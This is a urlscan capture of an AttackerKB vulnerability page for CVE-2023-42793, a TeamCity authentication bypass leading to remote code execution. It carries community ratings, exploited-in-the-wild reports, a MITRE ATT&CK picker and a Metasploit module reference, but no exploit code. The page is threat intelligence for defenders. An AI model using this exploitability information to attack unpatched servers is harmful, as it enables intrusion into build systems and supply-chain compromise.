attackerkb.com
Open in
urlscan Pro
34.196.20.75
Public Scan
Submitted URL: https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793?referrer=notificationEmail#rapid7-analysis/
Effective URL: https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793?referrer=notificationEmail
Submission Tags: demotag1 demotag2 Search All
Submission: On February 18 via api from RU — Scanned from DE
Effective URL: https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793?referrer=notificationEmail
Submission Tags: demotag1 demotag2 Search All
Submission: On February 18 via api from RU — Scanned from DE
Form analysis 3 forms found in the DOM
POST /search
<form action="/search" method="POST" id="search-condensed-form">
<input type="hidden" name="gorilla.csrf.Token" value="aUPmuet5QpkG9Mz1ZN60HVdVbFsofIau+dIpknLnbbEU12FJZf2AQ/jF9M465PkvzigmgZTJIlEima6Kp0q7+A==">
<input class="form-control nav-search" type="search" name="search" placeholder="Search..." aria-label="Search">
<button class="pseudo-search-button" type="submit"></button>
</form>POST /search
<form id="search" class="form-inline" action="/search" method="POST">
<input type="hidden" name="gorilla.csrf.Token" value="aUPmuet5QpkG9Mz1ZN60HVdVbFsofIau+dIpknLnbbEU12FJZf2AQ/jF9M465PkvzigmgZTJIlEima6Kp0q7+A==">
<input class="form-control nav-search" type="search" name="search" placeholder="Search..." aria-label="Search">
<button class="pseudo-search-button" type="submit"></button>
</form><form id="eitw-report-form" class="needs-validation" novalidate="">
<p class="report-exploited-description">AttackerKB users want to know this is information they can trust.<br> Help the community by indicating the source(s) of your knowledge:</p>
<ul>
<li>
<div class="form-check">
<input class="form-check-input eitw-checkbox" type="checkbox" value="" id="modal_vendorAdvisory">
<label class="form-check-label" for="modal_vendorAdvisory">Vendor Advisory</label>
</div>
<div class="add-reference collapse" id="modal_vendorAdvisoryReferenceCollapse">
<label class="" for="modal_vendorAdvisoryReference">Add a reference URL <span class="optional">(optional)</span>:</label>
<div class="add-reference-input">
<input type="text" id="modal_vendorAdvisoryReference" class="eitw-reference form-control" aria-describedby="vendorAdvisoryFeedback">
</div>
</div>
</li>
<li>
<div class="form-check">
<input class="form-check-input eitw-checkbox" type="checkbox" value="" id="modal_governmentAlert">
<label class="form-check-label" for="modal_governmentAlert">Government or Industry Alert</label>
</div>
<div class="add-reference collapse" id="modal_governmentAlertReferenceCollapse">
<label class="" for="modal_governmentAlertReference">Add a reference URL <span class="optional">(optional)</span>:</label>
<div class="add-reference-input">
<input type="text" id="modal_governmentAlertReference" class="eitw-reference form-control" aria-describedby="governmentAlertFeedback">
</div>
</div>
</li>
<li>
<div class="form-check">
<input class="form-check-input eitw-checkbox" type="checkbox" value="" id="modal_threatFeed">
<label class="form-check-label" for="modal_threatFeed">Threat Feed</label>
</div>
<div class="add-reference collapse" id="modal_threatFeedReferenceCollapse">
<label class="" for="modal_threatFeedReference">Add a reference URL <span class="optional">(optional)</span>:</label>
<div class="add-reference-input">
<input type="text" id="modal_threatFeedReference" class="eitw-reference form-control" aria-describedby="threatFeedFeedback">
</div>
</div>
</li>
<li>
<div class="form-check">
<input class="form-check-input eitw-checkbox" type="checkbox" value="" id="modal_news">
<label class="form-check-label" for="modal_news">News Article or Blog</label>
</div>
<div class="add-reference collapse" id="modal_newsReferenceCollapse">
<label class="" for="modal_newsReference">Add a reference URL <span class="optional">(optional)</span>:</label>
<div class="add-reference-input">
<input type="text" id="modal_newsReference" class="eitw-reference form-control" aria-describedby="newsFeedback">
</div>
</div>
</li>
<li>
<div class="form-check">
<input class="form-check-input eitw-checkbox" type="checkbox" value="" id="modal_personallyObserved">
<label class="form-check-label" for="modal_personallyObserved">Exploitation personally observed in an environment (client, customer, employer, or personal environment)</label>
</div>
<div class="add-reference collapse" id="modal_personallyObservedReferenceCollapse">
<label class="" for="modal_personallyObservedReference">Add a reference URL <span class="optional">(optional)</span>:</label>
<div class="add-reference-input">
<input type="text" id="modal_personallyObservedReference" class="eitw-reference form-control" aria-describedby="personallyObservedFeedback">
</div>
</div>
</li>
<li>
<div class="eitw-other-input-group form-check">
<input class="form-check-input eitw-checkbox" type="checkbox" value="" id="modal_eitwOther">
<label class="form-check-label" for="modal_eitwOther">Other:</label>
<div class="eitw-other-input">
<input type="text" id="modal_eitwOtherInput" class="eitw-required form-control" aria-describedby="eitwOtherInputFeedback" disabled="">
<div id="modal_eitwOtherInputFeedback" class="invalid-feedback"> Please explain the source of your report. </div>
</div>
</div>
<div class="add-reference collapse" id="modal_eitwOtherReferenceCollapse">
<label class="" for="modal_eitwOtherReference">Add a reference URL <span class="optional">(optional)</span>:</label>
<div class="add-reference-input">
<input type="text" id="modal_eitwOtherReference" class="eitw-reference form-control" aria-describedby="eitwOtherReferenceFeedback">
</div>
</div>
</li>
</ul>
</form>Text Content
A Rapid7 Project
* Activity Feed
* Topics
* About
* Leaderboard
*
Log In
Attacker Value
VERY HIGH
5
CVE-2023-42793
5
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references
from the CVE list and the National Vulnerability Database. If available, please
supply below:
CVE ID:
ADD REFERENCES:
ADVISORY
Description: URL:
Add Another
EXPLOIT
Description: URL:
Add Another
MITIGATION
Description: URL:
Add Another
RELATED ATTACKERKB TOPIC
Description: URL:
Add Another
MISCELLANEOUS
Description: URL:
Add Another
Cancel Submit
Attacker Value
VERY HIGH
(2 users assessed)
Exploitability
VERY HIGH
(2 users assessed)
User Interaction
UNKNOWN
Privileges Required
UNKNOWN
Attack Vector
UNKNOWN
5
CVE-2023-42793
Last updated September 27, 2023 ▾
CVE-2023-42793
Exploited in the Wild
Reported by ccondon-r7 and 2 more...
View Source Details
Report As Exploited in the Wild
MITRE ATT&CK Log in to add MITRE ATT&CK tag
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Collection
Techniques
Validation
Input Capture: Credential API Hooking
Validated
Impact
Techniques
Validation
Data Destruction
Validated
MITRE ATT&CK
Select the MITRE ATT&CK Tactics that apply to this CVE
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential
AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlImpact
COLLECTION
Select any Techniques used:
Data from Local System
Data from Removable Media
Data from Network Shared Drive
Input Capture
Input Capture: Keylogging
Input Capture: GUI Input Capture
Input Capture: Web Portal Capture
Input Capture: Credential API Hooking
Data Staged
Data Staged: Local Data Staging
Data Staged: Remote Data Staging
Screen Capture
Email Collection
Email Collection: Local Email Collection
Email Collection: Remote Email Collection
Email Collection: Email Forwarding Rule
Clipboard Data
Automated Collection
Audio Capture
Video Capture
Man in the Browser
Data from Information Repositories
Data from Information Repositories: Confluence
Data from Information Repositories: Sharepoint
Data from Cloud Storage Object
Man-in-the-Middle
Man-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay
Archive Collected Data
Archive Collected Data: Archive via Utility
Archive Collected Data: Archive via Library
Archive Collected Data: Archive via Custom Method
COMMAND AND CONTROL
Select any Techniques used:
Data Obfuscation
Data Obfuscation: Junk Data
Data Obfuscation: Steganography
Data Obfuscation: Protocol Impersonation
Fallback Channels
Application Layer Protocol
Application Layer Protocol: Web Protocols
Application Layer Protocol: File Transfer Protocols
Application Layer Protocol: Mail Protocols
Application Layer Protocol: DNS
Proxy
Proxy: Internal Proxy
Proxy: External Proxy
Proxy: Multi-hop Proxy
Proxy: Domain Fronting
Communication Through Removable Media
Non-Application Layer Protocol
Web Service
Web Service: Dead Drop Resolver
Web Service: Bidirectional Communication
Web Service: One-Way Communication
Multi-Stage Channels
Ingress Tool Transfer
Data Encoding
Data Encoding: Standard Encoding
Data Encoding: Non-Standard Encoding
Traffic Signaling
Traffic Signaling: Port Knocking
Remote Access Software
Dynamic Resolution
Dynamic Resolution: Fast Flux DNS
Dynamic Resolution: Domain Generation Algorithms
Dynamic Resolution: DNS Calculation
Non-Standard Port
Protocol Tunneling
Encrypted Channel
Encrypted Channel: Symmetric Cryptography
Encrypted Channel: Asymmetric Cryptography
CREDENTIAL ACCESS
Select any Techniques used:
OS Credential Dumping
OS Credential Dumping: LSASS Memory
OS Credential Dumping: Security Account Manager
OS Credential Dumping: NTDS
OS Credential Dumping: LSA Secrets
OS Credential Dumping: Cached Domain Credentials
OS Credential Dumping: DCSync
OS Credential Dumping: Proc Filesystem
OS Credential Dumping: /etc/passwd and /etc/shadow
Network Sniffing
Input Capture
Input Capture: Keylogging
Input Capture: GUI Input Capture
Input Capture: Web Portal Capture
Input Capture: Credential API Hooking
Brute Force
Brute Force: Password Guessing
Brute Force: Password Cracking
Brute Force: Password Spraying
Brute Force: Credential Stuffing
Two-Factor Authentication Interception
Forced Authentication
Exploitation for Credential Access
Steal Application Access Token
Steal Web Session Cookie
Unsecured Credentials
Unsecured Credentials: Credentials In Files
Unsecured Credentials: Credentials in Registry
Unsecured Credentials: Bash History
Unsecured Credentials: Private Keys
Unsecured Credentials: Cloud Instance Metadata API
Unsecured Credentials: Group Policy Preferences
Credentials from Password Stores
Credentials from Password Stores: Keychain
Credentials from Password Stores: Securityd Memory
Credentials from Password Stores: Credentials from Web Browsers
Modify Authentication Process
Modify Authentication Process: Domain Controller Authentication
Modify Authentication Process: Password Filter DLL
Modify Authentication Process: Pluggable Authentication Modules
Man-in-the-Middle
Man-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay
Steal or Forge Kerberos Tickets
Steal or Forge Kerberos Tickets: Golden Ticket
Steal or Forge Kerberos Tickets: Silver Ticket
Steal or Forge Kerberos Tickets: Kerberoasting
DEFENSE EVASION
Select any Techniques used:
Direct Volume Access
Rootkit
Obfuscated Files or Information
Obfuscated Files or Information: Binary Padding
Obfuscated Files or Information: Software Packing
Obfuscated Files or Information: Steganography
Obfuscated Files or Information: Compile After Delivery
Obfuscated Files or Information: Indicator Removal from Tools
Masquerading
Masquerading: Invalid Code Signature
Masquerading: Right-to-Left Override
Masquerading: Rename System Utilities
Masquerading: Masquerade Task or Service
Masquerading: Match Legitimate Name or Location
Masquerading: Space after Filename
Process Injection
Process Injection: Dynamic-link Library Injection
Process Injection: Portable Executable Injection
Process Injection: Thread Execution Hijacking
Process Injection: Asynchronous Procedure Call
Process Injection: Thread Local Storage
Process Injection: Ptrace System Calls
Process Injection: Proc Memory
Process Injection: Extra Window Memory Injection
Process Injection: Process Hollowing
Process Injection: Process Doppelgänging
Process Injection: VDSO Hijacking
Indicator Removal on Host
Indicator Removal on Host: Clear Windows Event Logs
Indicator Removal on Host: Clear Linux or Mac System Logs
Indicator Removal on Host: Clear Command History
Indicator Removal on Host: File Deletion
Indicator Removal on Host: Network Share Connection Removal
Indicator Removal on Host: Timestomp
Valid Accounts
Valid Accounts: Default Accounts
Valid Accounts: Domain Accounts
Valid Accounts: Local Accounts
Valid Accounts: Cloud Accounts
Modify Registry
Trusted Developer Utilities Proxy Execution
Trusted Developer Utilities Proxy Execution: MSBuild
Access Token Manipulation
Access Token Manipulation: Token Impersonation/Theft
Access Token Manipulation: Create Process with Token
Access Token Manipulation: Make and Impersonate Token
Access Token Manipulation: Parent PID Spoofing
Access Token Manipulation: SID-History Injection
Deobfuscate/Decode Files or Information
BITS Jobs
Indirect Command Execution
Traffic Signaling
Traffic Signaling: Port Knocking
Rogue Domain Controller
Exploitation for Defense Evasion
Signed Script Proxy Execution
Signed Script Proxy Execution: PubPrn
Signed Binary Proxy Execution
Signed Binary Proxy Execution: Compiled HTML File
Signed Binary Proxy Execution: Control Panel
Signed Binary Proxy Execution: CMSTP
Signed Binary Proxy Execution: InstallUtil
Signed Binary Proxy Execution: Mshta
Signed Binary Proxy Execution: Msiexec
Signed Binary Proxy Execution: Odbcconf
Signed Binary Proxy Execution: Regsvcs/Regasm
Signed Binary Proxy Execution: Regsvr32
Signed Binary Proxy Execution: Rundll32
XSL Script Processing
Template Injection
File and Directory Permissions Modification
File and Directory Permissions Modification: Windows File and Directory
Permissions Modification
File and Directory Permissions Modification: Linux and Mac File and Directory
Permissions Modification
Execution Guardrails
Execution Guardrails: Environmental Keying
Group Policy Modification
Virtualization/Sandbox Evasion
Virtualization/Sandbox Evasion: System Checks
Virtualization/Sandbox Evasion: User Activity Based Checks
Virtualization/Sandbox Evasion: Time Based Evasion
Unused/Unsupported Cloud Regions
Pre-OS Boot
Pre-OS Boot: System Firmware
Pre-OS Boot: Component Firmware
Pre-OS Boot: Bootkit
Abuse Elevation Control Mechanism
Abuse Elevation Control Mechanism: Setuid and Setgid
Abuse Elevation Control Mechanism: Bypass User Access Control
Abuse Elevation Control Mechanism: Sudo and Sudo Caching
Abuse Elevation Control Mechanism: Elevated Execution with Prompt
Use Alternate Authentication Material
Use Alternate Authentication Material: Application Access Token
Use Alternate Authentication Material: Pass the Hash
Use Alternate Authentication Material: Pass the Ticket
Use Alternate Authentication Material: Web Session Cookie
Subvert Trust Controls
Subvert Trust Controls: Gatekeeper Bypass
Subvert Trust Controls: Code Signing
Subvert Trust Controls: SIP and Trust Provider Hijacking
Subvert Trust Controls: Install Root Certificate
Modify Authentication Process
Modify Authentication Process: Domain Controller Authentication
Modify Authentication Process: Password Filter DLL
Modify Authentication Process: Pluggable Authentication Modules
Impair Defenses
Impair Defenses: Disable or Modify Tools
Impair Defenses: Disable Windows Event Logging
Impair Defenses: HISTCONTROL
Impair Defenses: Disable or Modify System Firewall
Impair Defenses: Indicator Blocking
Impair Defenses: Disable or Modify Cloud Firewall
Hide Artifacts
Hide Artifacts: Hidden Files and Directories
Hide Artifacts: Hidden Users
Hide Artifacts: Hidden Window
Hide Artifacts: NTFS File Attributes
Hide Artifacts: Hidden File System
Hide Artifacts: Run Virtual Instance
Hijack Execution Flow
Hijack Execution Flow: DLL Search Order Hijacking
Hijack Execution Flow: DLL Side-Loading
Hijack Execution Flow: Dylib Hijacking
Hijack Execution Flow: Executable Installer File Permissions Weakness
Hijack Execution Flow: LD_PRELOAD
Hijack Execution Flow: Path Interception by PATH Environment Variable
Hijack Execution Flow: Path Interception by Search Order Hijacking
Hijack Execution Flow: Path Interception by Unquoted Path
Hijack Execution Flow: Services File Permissions Weakness
Hijack Execution Flow: Services Registry Permissions Weakness
Hijack Execution Flow: COR_PROFILER
Modify Cloud Compute Infrastructure
Modify Cloud Compute Infrastructure: Create Snapshot
Modify Cloud Compute Infrastructure: Create Cloud Instance
Modify Cloud Compute Infrastructure: Delete Cloud Instance
Modify Cloud Compute Infrastructure: Revert Cloud Instance
DISCOVERY
Select any Techniques used:
System Service Discovery
Application Window Discovery
Query Registry
System Network Configuration Discovery
Remote System Discovery
System Owner/User Discovery
Network Sniffing
Network Service Scanning
System Network Connections Discovery
Process Discovery
Permission Groups Discovery
Permission Groups Discovery: Local Groups
Permission Groups Discovery: Domain Groups
Permission Groups Discovery: Cloud Groups
System Information Discovery
File and Directory Discovery
Account Discovery
Account Discovery: Local Account
Account Discovery: Domain Account
Account Discovery: Email Account
Account Discovery: Cloud Account
Peripheral Device Discovery
System Time Discovery
Network Share Discovery
Password Policy Discovery
Browser Bookmark Discovery
Domain Trust Discovery
Virtualization/Sandbox Evasion
Virtualization/Sandbox Evasion: System Checks
Virtualization/Sandbox Evasion: User Activity Based Checks
Virtualization/Sandbox Evasion: Time Based Evasion
Software Discovery
Software Discovery: Security Software Discovery
Cloud Service Discovery
Cloud Service Dashboard
EXECUTION
Select any Techniques used:
Windows Management Instrumentation
Scheduled Task/Job
Scheduled Task/Job: At (Linux)
Scheduled Task/Job: At (Windows)
Scheduled Task/Job: Cron
Scheduled Task/Job: Launchd
Scheduled Task/Job: Scheduled Task
Command and Scripting Interpreter
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: AppleScript
Command and Scripting Interpreter: Windows Command Shell
Command and Scripting Interpreter: Unix Shell
Command and Scripting Interpreter: Visual Basic
Command and Scripting Interpreter: Python
Command and Scripting Interpreter: JavaScript/JScript
Software Deployment Tools
Native API
Shared Modules
Exploitation for Client Execution
User Execution
User Execution: Malicious Link
User Execution: Malicious File
Inter-Process Communication
Inter-Process Communication: Component Object Model
Inter-Process Communication: Dynamic Data Exchange
System Services
System Services: Launchctl
System Services: Service Execution
EXFILTRATION
Select any Techniques used:
Exfiltration Over Other Network Medium
Exfiltration Over Other Network Medium: Exfiltration Over Bluetooth
Automated Exfiltration
Scheduled Transfer
Data Transfer Size Limits
Exfiltration Over C2 Channel
Exfiltration Over Alternative Protocol
Exfiltration Over Alternative Protocol: Exfiltration Over Symmetric Encrypted
Non-C2 Protocol
Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted
Non-C2 Protocol
Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated
Non-C2 Protocol
Exfiltration Over Physical Medium
Exfiltration Over Physical Medium: Exfiltration over USB
Transfer Data to Cloud Account
Exfiltration Over Web Service
Exfiltration Over Web Service: Exfiltration to Code Repository
Exfiltration Over Web Service: Exfiltration to Cloud Storage
IMPACT
Select any Techniques used:
Data Destruction
Data Encrypted for Impact
Service Stop
Inhibit System Recovery
Defacement
Defacement: Internal Defacement
Defacement: External Defacement
Firmware Corruption
Resource Hijacking
Network Denial of Service
Network Denial of Service: Direct Network Flood
Network Denial of Service: Reflection Amplification
Endpoint Denial of Service
Endpoint Denial of Service: OS Exhaustion Flood
Endpoint Denial of Service: Service Exhaustion Flood
Endpoint Denial of Service: Application Exhaustion Flood
Endpoint Denial of Service: Application or System Exploitation
System Shutdown/Reboot
Account Access Removal
Disk Wipe
Disk Wipe: Disk Content Wipe
Disk Wipe: Disk Structure Wipe
Data Manipulation
Data Manipulation: Stored Data Manipulation
Data Manipulation: Transmitted Data Manipulation
Data Manipulation: Runtime Data Manipulation
INITIAL ACCESS
Select any Techniques used:
Valid Accounts
Valid Accounts: Default Accounts
Valid Accounts: Domain Accounts
Valid Accounts: Local Accounts
Valid Accounts: Cloud Accounts
Replication Through Removable Media
External Remote Services
Drive-by Compromise
Exploit Public-Facing Application
Supply Chain Compromise
Supply Chain Compromise: Compromise Software Dependencies and Development Tools
Supply Chain Compromise: Compromise Software Supply Chain
Supply Chain Compromise: Compromise Hardware Supply Chain
Trusted Relationship
Hardware Additions
Phishing
Phishing: Spearphishing Attachment
Phishing: Spearphishing Link
Phishing: Spearphishing via Service
LATERAL MOVEMENT
Select any Techniques used:
Remote Services
Remote Services: Remote Desktop Protocol
Remote Services: SMB/Windows Admin Shares
Remote Services: Distributed Component Object Model
Remote Services: SSH
Remote Services: VNC
Remote Services: Windows Remote Management
Software Deployment Tools
Taint Shared Content
Replication Through Removable Media
Exploitation of Remote Services
Internal Spearphishing
Use Alternate Authentication Material
Use Alternate Authentication Material: Application Access Token
Use Alternate Authentication Material: Pass the Hash
Use Alternate Authentication Material: Pass the Ticket
Use Alternate Authentication Material: Web Session Cookie
Remote Service Session Hijacking
Remote Service Session Hijacking: SSH Hijacking
Remote Service Session Hijacking: RDP Hijacking
Lateral Tool Transfer
PERSISTENCE
Select any Techniques used:
Boot or Logon Initialization Scripts
Boot or Logon Initialization Scripts: Logon Script (Windows)
Boot or Logon Initialization Scripts: Logon Script (Mac)
Boot or Logon Initialization Scripts: Network Logon Script
Boot or Logon Initialization Scripts: Rc.common
Boot or Logon Initialization Scripts: Startup Items
Scheduled Task/Job
Scheduled Task/Job: At (Linux)
Scheduled Task/Job: At (Windows)
Scheduled Task/Job: Cron
Scheduled Task/Job: Launchd
Scheduled Task/Job: Scheduled Task
Valid Accounts
Valid Accounts: Default Accounts
Valid Accounts: Domain Accounts
Valid Accounts: Local Accounts
Valid Accounts: Cloud Accounts
Account Manipulation
Account Manipulation: Additional Azure Service Principal Credentials
Account Manipulation: Exchange Email Delegate Permissions
Account Manipulation: Add Office 365 Global Administrator Role
Account Manipulation: SSH Authorized Keys
External Remote Services
Create Account
Create Account: Local Account
Create Account: Domain Account
Create Account: Cloud Account
Office Application Startup
Office Application Startup: Office Template Macros
Office Application Startup: Office Test
Office Application Startup: Outlook Forms
Office Application Startup: Outlook Home Page
Office Application Startup: Outlook Rules
Office Application Startup: Add-ins
Browser Extensions
BITS Jobs
Traffic Signaling
Traffic Signaling: Port Knocking
Server Software Component
Server Software Component: SQL Stored Procedures
Server Software Component: Transport Agent
Server Software Component: Web Shell
Implant Container Image
Pre-OS Boot
Pre-OS Boot: System Firmware
Pre-OS Boot: Component Firmware
Pre-OS Boot: Bootkit
Create or Modify System Process
Create or Modify System Process: Launch Agent
Create or Modify System Process: Systemd Service
Create or Modify System Process: Windows Service
Create or Modify System Process: Launch Daemon
Event Triggered Execution
Event Triggered Execution: Change Default File Association
Event Triggered Execution: Screensaver
Event Triggered Execution: Windows Management Instrumentation Event Subscription
Event Triggered Execution: .bash_profile and .bashrc
Event Triggered Execution: Trap
Event Triggered Execution: LC_LOAD_DYLIB Addition
Event Triggered Execution: Netsh Helper DLL
Event Triggered Execution: Accessibility Features
Event Triggered Execution: AppCert DLLs
Event Triggered Execution: AppInit DLLs
Event Triggered Execution: Application Shimming
Event Triggered Execution: Image File Execution Options Injection
Event Triggered Execution: PowerShell Profile
Event Triggered Execution: Emond
Event Triggered Execution: Component Object Model Hijacking
Boot or Logon Autostart Execution
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Boot or Logon Autostart Execution: Authentication Package
Boot or Logon Autostart Execution: Time Providers
Boot or Logon Autostart Execution: Winlogon Helper DLL
Boot or Logon Autostart Execution: Security Support Provider
Boot or Logon Autostart Execution: Kernel Modules and Extensions
Boot or Logon Autostart Execution: Re-opened Applications
Boot or Logon Autostart Execution: LSASS Driver
Boot or Logon Autostart Execution: Shortcut Modification
Boot or Logon Autostart Execution: Port Monitors
Boot or Logon Autostart Execution: Plist Modification
Compromise Client Software Binary
Hijack Execution Flow
Hijack Execution Flow: DLL Search Order Hijacking
Hijack Execution Flow: DLL Side-Loading
Hijack Execution Flow: Dylib Hijacking
Hijack Execution Flow: Executable Installer File Permissions Weakness
Hijack Execution Flow: LD_PRELOAD
Hijack Execution Flow: Path Interception by PATH Environment Variable
Hijack Execution Flow: Path Interception by Search Order Hijacking
Hijack Execution Flow: Path Interception by Unquoted Path
Hijack Execution Flow: Services File Permissions Weakness
Hijack Execution Flow: Services Registry Permissions Weakness
Hijack Execution Flow: COR_PROFILER
PRIVILEGE ESCALATION
Select any Techniques used:
Boot or Logon Initialization Scripts
Boot or Logon Initialization Scripts: Logon Script (Windows)
Boot or Logon Initialization Scripts: Logon Script (Mac)
Boot or Logon Initialization Scripts: Network Logon Script
Boot or Logon Initialization Scripts: Rc.common
Boot or Logon Initialization Scripts: Startup Items
Scheduled Task/Job
Scheduled Task/Job: At (Linux)
Scheduled Task/Job: At (Windows)
Scheduled Task/Job: Cron
Scheduled Task/Job: Launchd
Scheduled Task/Job: Scheduled Task
Process Injection
Process Injection: Dynamic-link Library Injection
Process Injection: Portable Executable Injection
Process Injection: Thread Execution Hijacking
Process Injection: Asynchronous Procedure Call
Process Injection: Thread Local Storage
Process Injection: Ptrace System Calls
Process Injection: Proc Memory
Process Injection: Extra Window Memory Injection
Process Injection: Process Hollowing
Process Injection: Process Doppelgänging
Process Injection: VDSO Hijacking
Exploitation for Privilege Escalation
Valid Accounts
Valid Accounts: Default Accounts
Valid Accounts: Domain Accounts
Valid Accounts: Local Accounts
Valid Accounts: Cloud Accounts
Access Token Manipulation
Access Token Manipulation: Token Impersonation/Theft
Access Token Manipulation: Create Process with Token
Access Token Manipulation: Make and Impersonate Token
Access Token Manipulation: Parent PID Spoofing
Access Token Manipulation: SID-History Injection
Group Policy Modification
Create or Modify System Process
Create or Modify System Process: Launch Agent
Create or Modify System Process: Systemd Service
Create or Modify System Process: Windows Service
Create or Modify System Process: Launch Daemon
Event Triggered Execution
Event Triggered Execution: Change Default File Association
Event Triggered Execution: Screensaver
Event Triggered Execution: Windows Management Instrumentation Event Subscription
Event Triggered Execution: .bash_profile and .bashrc
Event Triggered Execution: Trap
Event Triggered Execution: LC_LOAD_DYLIB Addition
Event Triggered Execution: Netsh Helper DLL
Event Triggered Execution: Accessibility Features
Event Triggered Execution: AppCert DLLs
Event Triggered Execution: AppInit DLLs
Event Triggered Execution: Application Shimming
Event Triggered Execution: Image File Execution Options Injection
Event Triggered Execution: PowerShell Profile
Event Triggered Execution: Emond
Event Triggered Execution: Component Object Model Hijacking
Boot or Logon Autostart Execution
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Boot or Logon Autostart Execution: Authentication Package
Boot or Logon Autostart Execution: Time Providers
Boot or Logon Autostart Execution: Winlogon Helper DLL
Boot or Logon Autostart Execution: Security Support Provider
Boot or Logon Autostart Execution: Kernel Modules and Extensions
Boot or Logon Autostart Execution: Re-opened Applications
Boot or Logon Autostart Execution: LSASS Driver
Boot or Logon Autostart Execution: Shortcut Modification
Boot or Logon Autostart Execution: Port Monitors
Boot or Logon Autostart Execution: Plist Modification
Abuse Elevation Control Mechanism
Abuse Elevation Control Mechanism: Setuid and Setgid
Abuse Elevation Control Mechanism: Bypass User Access Control
Abuse Elevation Control Mechanism: Sudo and Sudo Caching
Abuse Elevation Control Mechanism: Elevated Execution with Prompt
Hijack Execution Flow
Hijack Execution Flow: DLL Search Order Hijacking
Hijack Execution Flow: DLL Side-Loading
Hijack Execution Flow: Dylib Hijacking
Hijack Execution Flow: Executable Installer File Permissions Weakness
Hijack Execution Flow: LD_PRELOAD
Hijack Execution Flow: Path Interception by PATH Environment Variable
Hijack Execution Flow: Path Interception by Search Order Hijacking
Hijack Execution Flow: Path Interception by Unquoted Path
Hijack Execution Flow: Services File Permissions Weakness
Hijack Execution Flow: Services Registry Permissions Weakness
Hijack Execution Flow: COR_PROFILER
Submit
Metasploit Module
exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793
CISA KEV ListedGives privileged accessObserved in nation state sponsored
attacksObserved in ransomware attacksUnauthenticatedVulnerable in default
configuration
TOPIC TAGS
Select the tags that apply to this CVE (Assessment added tags are disabled and
cannot be removed)
What makes this of high-value to an attacker?
Vulnerable in default configuration
Unauthenticated
Observed in ransomware attacks
Observed in nation state sponsored attacks
Gives privileged access
Easy to weaponize
Difficult to patch
Common in enterprise
CISA KEV Listed
What makes this of low-value to an attacker?
Vulnerable in uncommon configuration
Requires user interaction
Requires physical access
Requires elevated access
No useful access
Difficult to weaponize
Authenticated
Submit
DESCRIPTION
In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on
TeamCity Server was possible
See More See Less
* Ratings & Analysis
* Vulnerability Details
* Analysis
ADD ASSESSMENT
Log in to add an Assessment
2
sfewer-r7 (72)
September 27, 2023 1:47pm UTC (4 months ago)•
Edited 4 months ago ▾
RATINGS
Attacker Value
Very High
Exploitability
Very High
Gives privileged accessUnauthenticatedVulnerable in default configuration
TECHNICAL ANALYSIS
Based on the accompanying Rapid7 Analysis, the attacker value for CVE-2023-42793
is very high given the target product is a CI/CD server, and as such may contain
sanative information such as source code or signing keys, in addition to being a
vector for conducting a supply chain attack. The exploitability for this
vulnerability is also very high, as the product is vulnerable in a default
configuration and an attacker can trivially exploit it with a sequence of cURL
commands.
WOULD YOU ALSO LIKE TO DELETE YOUR EXPLOITED IN THE WILD REPORT?
Delete Assessment Only Delete Assessment and Exploited in the Wild Report
Log in to Add Reply
See MoreSee Less
1
cbeek-r7 (94)
October 19, 2023 11:53am UTC (3 months ago)
RATINGS
Attacker Value
Very High
Exploitability
Very High
CISA KEV ListedGives privileged accessObserved in nation state sponsored
attacksUnauthenticatedVulnerable in default configuration
TECHNICAL ANALYSIS
Microsoft released a blog where they mentioned the abuse of this vulnerability
by nation-state sponsored actors
WOULD YOU ALSO LIKE TO DELETE YOUR EXPLOITED IN THE WILD REPORT?
Delete Assessment Only Delete Assessment and Exploited in the Wild Report
Log in to Add Reply
See MoreSee Less
GENERAL INFORMATION
Offensive Application
Unknown
Utility Class
Unknown
Ports
Unknown
OS
Unknown
Vulnerable Versions
TeamCity 2023.05.4
Prerequisites
Unknown
Discovered By
Unknown
PoC Author
Unknown
Metasploit Module
Unknown
Reporter
Unknown
VENDORS
* JetBrains
PRODUCTS
* TeamCity
METASPLOIT MODULES
exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793
(https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/jetbrains_teamcity_rce_cve_2023_42793.rb)
EXPLOITED IN THE WILD
Reported by:
ccondon-r7 indicated source as Threat Feed
(https://viz.greynoise.io/tag/jetbrains-teamcity-authentication-bypass-attempt?days=10)
Reported: October 02, 2023 11:52am UTC (4 months ago)
WOULD YOU LIKE TO DELETE THIS EXPLOITED IN THE WILD REPORT?
Yes, delete this report
inokii indicated sources as
* Government or Industry Alert
(https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
* Other: CISA Gov Alert
(https://www.cisa.gov/news-events/alerts/2023/10/04/cisa-adds-two-known-exploited-vulnerabilities-catalog-removes-five-kevs)
Reported: October 04, 2023 9:30pm UTC (4 months ago)
WOULD YOU LIKE TO DELETE THIS EXPLOITED IN THE WILD REPORT?
Yes, delete this report
cbeek-r7 indicated source as Government or Industry Alert
(https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/)
Reported: October 19, 2023 11:53am UTC (3 months ago)
WOULD YOU LIKE TO DELETE THIS EXPLOITED IN THE WILD REPORT?
Yes, delete this report
REFERENCES
CANONICAL
CVE-2023-42793 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-42793)
MISCELLANEOUS
https://www.jetbrains.com/privacy-security/issues-fixed/
https://blog.jetbrains.com/teamcity/2023/09/cve-2023-42793-vulnerability-post-mortem/
http://packetstormsecurity.com/files/174860/JetBrains-TeamCity-Unauthenticated-Remote-Code-Execution.html
